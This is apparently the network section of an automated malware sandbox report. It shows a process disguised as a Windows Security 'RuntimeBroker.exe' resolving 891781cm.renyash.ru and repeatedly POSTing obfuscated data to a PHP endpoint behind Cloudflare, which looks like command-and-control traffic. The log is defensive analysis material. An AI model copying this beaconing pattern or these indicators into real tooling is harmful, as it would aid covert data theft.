                                                                                                                          Jan 1, 2025 04:25:57.716311932 CET8050328104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:57.716378927 CET5032880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:57.716454029 CET5032880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:57.721245050 CET8050328104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:57.835854053 CET5032880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:57.840749979 CET5032980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:57.845644951 CET8050329104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:57.845696926 CET5032980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:57.845839024 CET5032980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:57.850600004 CET8050329104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:57.883718014 CET8050328104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:58.089545965 CET8050328104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:58.089616060 CET5032880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:58.193959951 CET5032980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:58.198961973 CET8050329104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:58.298367023 CET8050329104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:58.428225040 CET5032980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:58.578388929 CET8050329104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:58.633904934 CET5032980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:58.706326962 CET5032980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:58.706480026 CET5033080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:58.711349010 CET8050330104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:58.711407900 CET8050329104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:58.713799953 CET5032980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:58.713845968 CET5033080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:58.713891983 CET5033080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:58.718657970 CET8050330104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:59.068980932 CET5033080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:59.074248075 CET8050330104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:59.182156086 CET8050330104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:59.334495068 CET5033080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:59.442967892 CET8050330104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:59.522090912 CET5033080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:00.373011112 CET5033180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:00.406711102 CET8050331104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:26:00.406773090 CET5033180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:00.406944990 CET5033180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:00.411775112 CET8050331104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:26:00.756402969 CET5033180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:00.761313915 CET8050331104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:26:00.863845110 CET8050331104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:26:00.928234100 CET5033180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:01.120897055 CET8050331104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:26:01.236401081 CET5033180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:01.236809015 CET5033280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:01.241404057 CET8050331104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:26:01.241461039 CET5033180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:01.241625071 CET8050332104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:26:01.241686106 CET5033280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:01.241853952 CET5033280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:01.246669054 CET8050332104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:26:01.600195885 CET5033280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:01.605076075 CET8050332104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:26:01.686036110 CET8050332104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:26:01.818861008 CET5033280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:01.956126928 CET8050332104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:26:02.089818001 CET5033080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:02.090821981 CET5033280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:02.091315985 CET5033380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:02.095886946 CET8050332104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:26:02.095963001 CET5033280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:02.096168995 CET8050333104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:26:02.096232891 CET5033380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:02.096353054 CET5033380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:02.101147890 CET8050333104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:26:02.444000006 CET5033380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:02.448839903 CET8050333104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:26:02.568550110 CET8050333104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:26:02.675465107 CET5033380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:26:02.753201008 CET8050333104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:26:02.818922997 CET5033380192.168.2.4104.21.38.84

                                                                                                                          UDP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Jan 1, 2025 04:22:06.679876089 CET6303253192.168.2.41.1.1.1
                                                                                                                          Jan 1, 2025 04:22:06.813749075 CET53630321.1.1.1192.168.2.4

                                                                                                                          DNS Queries

                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Jan 1, 2025 04:22:06.679876089 CET192.168.2.41.1.1.10x7977Standard query (0)891781cm.renyash.ruA (IP address)IN (0x0001)false

                                                                                                                          DNS Answers

                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Jan 1, 2025 04:22:06.813749075 CET1.1.1.1192.168.2.40x7977No error (0)891781cm.renyash.ru104.21.38.84A (IP address)IN (0x0001)false
                                                                                                                          Jan 1, 2025 04:22:06.813749075 CET1.1.1.1192.168.2.40x7977No error (0)891781cm.renyash.ru172.67.220.198A (IP address)IN (0x0001)false

                                                                                                                          HTTP Request Dependency Graph

                                                                                                                          • 891781cm.renyash.ru

                                                                                                                          HTTP Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.449730104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:06.827776909 CET343OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 344
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:07.178580999 CET344OUTData Raw: 05 05 01 00 06 09 01 01 05 06 02 01 02 01 01 07 00 0b 05 08 02 07 03 01 03 04 0a 07 05 07 02 50 0d 00 03 09 01 0c 05 03 0f 0b 02 05 06 01 05 06 06 01 0d 01 0a 01 01 00 04 07 05 03 06 55 05 00 02 05 0f 09 07 0f 06 04 0e 00 0d 0e 0d 03 0c 01 04 0c
                                                                                                                          Data Ascii: PU_Q\L}R|svwb[Bv|@hBWv|Y|]hxUg{`jJhm|Atgxie~V@{}PA}L[
                                                                                                                          Jan 1, 2025 04:22:07.272933960 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:07.567734957 CET1236INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:07 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pf%2BfTPiBhNTw%2BNA3uPLOz25bu5JeIJtd7IGHZn%2FNqi78yuXLai0Ru205FESR9gFYWq9DoKmnELxUlXg5bH8iOyD0yePIatQudMkkVzz%2Fba6bCO6C%2BZ816EAkX8n0bhA2AFS9uIfy"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62132f470f3f-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4066&min_rtt=1690&rtt_var=5385&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=687&delivery_rate=70538&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 35 35 30 0d 0a 56 4a 7e 4d 78 43 64 5f 79 61 78 46 7f 61 77 49 7c 67 64 53 7f 63 75 09 7a 4d 74 06 6a 5b 60 04 77 70 66 52 6e 71 76 5e 75 75 74 48 6a 5b 78 01 55 4b 71 41 74 5b 68 58 68 71 79 4c 68 64 66 0c 78 76 78 0a 7c 70 6b 00 61 5b 71 02 74 62 75 04 7f 58 66 03 7e 42 5d 53 69 01 60 5a 75 4c 7b 06 7c 5b 7d 47 7e 5e 53 49 6f 49 78 01 6f 67 77 5c 7b 7e 68 59 6d 71 6c 4b 6f 73 76 02 7f 4e 7b 58 7b 77 78 00 7d 62 6c 5c 76 61 59 5b 7a 51 41 5b 7f 64 78 0a 68 71 5c 52 76 52 5a 06 7a 6c 5d 5d 60 5e 5c 4e 79 71 58 59 69 6c 58 4c 7b 61 57 5a 61 60 67 44 62 58 7f 5c 60 61 62 50 7e 5d 79 5f 60 61 7d 01 76 65 55 50 68 6f 76 5d 60 6f 7c 04 7c 63 6c 02 6f 6f 73 03 6f 63 76 00 7c 6d 5e 08 77 49 6c 04 7e 62 76 09 6a 0b 6f 40 6f 6e 72 02 7f 62 76 5e 7b 5d 46 51 7d 6c 55 55 7d 63 7c 09 7e 77 62 00 6f 7d 5e 5f 7b 72 7b 5c 7e 61 60 5e 7d 59 51 40 7e 70 65 40 79 4d 6b 5f 69 5c 52 49 63 5a 75 51 7b 5c 79 49 76 76 60 4a 7d 76 68 40 7f 66 79 08 77 5c 55 4b 7c 5c 61 4c 7d 77 54 0c 78 66 52 4f 7e 63 7b 03 75 4c 5b 05 74 [TRUNCATED]
                                                                                                                          Data Ascii: 550VJ~MxCd_yaxFawI|gdScuzMtj[`wpfRnqv^uutHj[xUKqAt[hXhqyLhdfxvx|pka[qtbuXf~B]Si`ZuL{|[}G~^SIoIxogw\{~hYmqlKosvN{X{wx}bl\vaY[zQA[dxhq\RvRZzl]]`^\NyqXYilXL{aWZa`gDbX\`abP~]y_`a}veUPhov]`o||cloosocv|m^wIl~bvjo@onrbv^{]FQ}lUU}c|~wbo}^_{r{\~a`^}YQ@~pe@yMk_i\RIcZuQ{\yIvv`J}vh@fyw\UK|\aL}wTxfRO~c{uL[tqaG~qT~R|gcv_{\_J}^iK{YhLxI^ymzr`xM~LN|{gR}L]OuOxI}RsK|IZA|_avllNzlht^nzaqJ}l~zqjuMsJvq
                                                                                                                          Jan 1, 2025 04:22:07.567765951 CET929INData Raw: 78 03 77 61 72 41 7f 70 7a 07 74 4c 71 4c 76 75 68 0d 7f 6c 71 4d 74 52 5a 42 7f 63 60 44 78 42 7f 01 7a 70 62 49 7c 43 5e 43 76 67 52 02 7e 62 76 0b 7d 43 67 09 78 6d 76 4f 7f 62 57 4f 7c 5e 78 4f 7f 52 52 08 7e 4e 70 09 7d 49 6e 05 78 43 6b 44
                                                                                                                          Data Ascii: xwarApztLqLvuhlqMtRZBc`DxBzpbI|C^CvgR~bv}CgxmvObWO|^xORR~Np}InxCkDyr|K|qc}IQA|Ni@z]x}r`Hwseyauwfp~HZ}faAw\kD}ryBYXyfhB~cvr[tq}aX|pgDvqUIxrS}NuDyg`ywxy}gzb|xs~{]NZ{t`K}qxZvqQZj{kY`qq@w|pxl{XwYfNz}}
                                                                                                                          Jan 1, 2025 04:22:07.599464893 CET319OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 384
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:22:07.693603039 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:07.693814039 CET384OUTData Raw: 50 54 58 55 5a 57 51 5b 55 5a 54 59 51 5f 55 54 58 53 5c 54 59 53 52 5b 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PTXUZWQ[UZTYQ_UTXS\TYSR[][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#?=Z7&1.\).'>P,$$"P'?3X;X'+3>#^!'^)7
                                                                                                                          Jan 1, 2025 04:22:07.960797071 CET957INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:07 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CvJqxSYpGUNZm%2F7XlgnTdIdl4zwwgPjaxTH%2Fx02kaLLYMHUnptNEr9JeFT9uA4QLpVuABdIFCuOQzmrCgWR2H%2BFfjNYUHJyf5lPiwOi9DBPFWXxMAwtJKDgmdKzikf8yNTywLbHt"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6215d9e60f3f-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=6094&min_rtt=1690&rtt_var=8082&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2215&recv_bytes=1390&delivery_rate=2444196&cwnd=196&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 22 1d 30 15 2c 07 2b 00 00 11 3b 3c 33 55 31 2f 2e 17 25 23 34 5b 32 3e 3d 5e 2f 28 30 1e 3c 3b 33 10 24 3a 00 07 20 1f 21 04 31 36 2e 5d 04 1d 25 5d 3f 3a 31 01 3c 59 25 5f 2a 0c 20 5c 27 27 09 59 25 24 24 1e 30 3d 2e 5a 21 0b 3c 0a 27 0a 38 1f 28 07 20 01 27 04 25 09 37 00 2e 57 0d 12 22 51 32 00 14 0a 29 08 2b 0a 20 3c 28 0b 30 3c 3f 56 26 2c 0e 51 23 28 2e 57 2a 11 05 05 35 19 39 51 27 14 0d 59 36 00 2e 02 21 19 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98"0,+;<3U1/.%#4[2>=^/(0<;3$: !16.]%]?:1<Y%_* \''Y%$$0=.Z!<'8( '%7.W"Q2)+ <(0<?V&,Q#(.W*59Q'Y6.!"T /T=VO0
                                                                                                                          Jan 1, 2025 04:22:08.016643047 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:22:08.110564947 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:08.110832930 CET1056OUTData Raw: 55 55 58 51 5f 5d 54 5e 55 5a 54 59 51 53 55 5c 58 5d 5c 58 59 50 52 5e 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UUXQ_]T^UZTYQSU\X]\XYPR^][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#+%[ ]"&=+X37&W-?',13?;_/=(<=4(,#^!'^)
                                                                                                                          Jan 1, 2025 04:22:08.383697033 CET814INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:08 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kr2S4gUAP4geXrT2LDeNZ8a1hYIEV78zhFCKFz78QMB8nYXHdd%2FMcGDYlQUxsFpY9SsYcvaWIIpxvWS%2FXAxoIHR1g%2BTmwuZmKUIjgGyPupVDyvNmYMQ6KadOKv8FJFOBzhINh%2FQ%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62186cf00f3f-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=6263&min_rtt=1690&rtt_var=6779&sent=12&recv=13&lost=0&retrans=0&sent_bytes=3197&recv_bytes=2766&delivery_rate=2444196&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.449731104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:08.042088985 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1780
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:22:08.398179054 CET1780OUTData Raw: 50 54 58 50 5f 59 54 5f 55 5a 54 59 51 53 55 5c 58 59 5c 5f 59 52 52 58 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PTXP_YT_UZTYQSU\XY\_YRRX][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ <?&!;%X&=)*$'!.7<3"W0 ,='<'>#^!'^)
                                                                                                                          Jan 1, 2025 04:22:08.501847029 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:08.757385969 CET959INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:08 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QQTPvk7vmJmtnusdQNfYNod73D8SZqUOR2TP4mtGOodEWahDrXTV3A2qwtoGWQdXa9OqQPKeqM47wGOUo%2Fbl5%2BU%2BBTIk6rqIlG%2FKLWs5iMiPBMTyPkbrIX62AuIvFiT6i%2BywoI%2FY"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf621ad80617a9-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4635&min_rtt=1490&rtt_var=6849&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2100&delivery_rate=54782&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 22 55 24 38 34 07 28 2d 22 1e 2c 06 2b 1d 25 01 08 15 24 23 30 1d 25 00 3a 00 39 5e 2c 13 2b 3b 23 59 25 2a 25 59 20 1f 0f 01 25 36 2e 5d 04 1d 25 58 3d 14 22 59 28 2c 2d 5f 3d 32 2c 5f 26 27 23 13 25 34 24 5d 24 5b 3d 03 36 1c 33 1d 24 33 24 54 3c 39 38 01 24 03 22 54 20 10 2e 57 0d 12 22 54 26 3e 3a 0b 2a 08 20 54 36 5a 3f 1f 27 3f 24 08 30 02 3b 0e 21 3b 22 54 3d 3c 20 5b 21 19 35 50 27 39 20 07 22 2a 2e 04 23 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98"U$84(-",+%$#0%:9^,+;#Y%*%Y %6.]%X="Y(,-_=2,_&'#%4$]$[=63$3$T<98$"T .W"T&>:* T6Z?'?$0;!;"T=< [!5P'9 "*.#3"T /T=VO0
                                                                                                                          Jan 1, 2025 04:22:08.994477034 CET959INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:08 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QQTPvk7vmJmtnusdQNfYNod73D8SZqUOR2TP4mtGOodEWahDrXTV3A2qwtoGWQdXa9OqQPKeqM47wGOUo%2Fbl5%2BU%2BBTIk6rqIlG%2FKLWs5iMiPBMTyPkbrIX62AuIvFiT6i%2BywoI%2FY"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf621ad80617a9-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4635&min_rtt=1490&rtt_var=6849&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2100&delivery_rate=54782&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 22 55 24 38 34 07 28 2d 22 1e 2c 06 2b 1d 25 01 08 15 24 23 30 1d 25 00 3a 00 39 5e 2c 13 2b 3b 23 59 25 2a 25 59 20 1f 0f 01 25 36 2e 5d 04 1d 25 58 3d 14 22 59 28 2c 2d 5f 3d 32 2c 5f 26 27 23 13 25 34 24 5d 24 5b 3d 03 36 1c 33 1d 24 33 24 54 3c 39 38 01 24 03 22 54 20 10 2e 57 0d 12 22 54 26 3e 3a 0b 2a 08 20 54 36 5a 3f 1f 27 3f 24 08 30 02 3b 0e 21 3b 22 54 3d 3c 20 5b 21 19 35 50 27 39 20 07 22 2a 2e 04 23 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98"U$84(-",+%$#0%:9^,+;#Y%*%Y %6.]%X="Y(,-_=2,_&'#%4$]$[=63$3$T<98$"T .W"T&>:* T6Z?'?$0;!;"T=< [!5P'9 "*.#3"T /T=VO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.449734104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:08.523140907 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:22:08.881628036 CET1056OUTData Raw: 50 54 58 5c 5a 5f 51 58 55 5a 54 59 51 5e 55 5c 58 53 5c 55 59 50 52 5e 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PTX\Z_QXUZTYQ^U\XS\UYPR^][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ +Y=Z 2Y>437&94'.Q'?#Z;>+R>#^!'^)3
                                                                                                                          Jan 1, 2025 04:22:08.994489908 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:09.361646891 CET805INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:09 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OhAMZJcOsn3NPBq6gh6%2BqSWgYX4iEjVhzzWGn9tL08vEbC5s7daomMX152J3tmpOn9kfbYWGmhbvFNETO2LRNSDyrZ%2F5Sj0gRfTZyYJcNBrCwG1r%2FmnimYqgZIgGkN1OMH4E1z1B"}],"group":"cf-nel","max_age":604800}
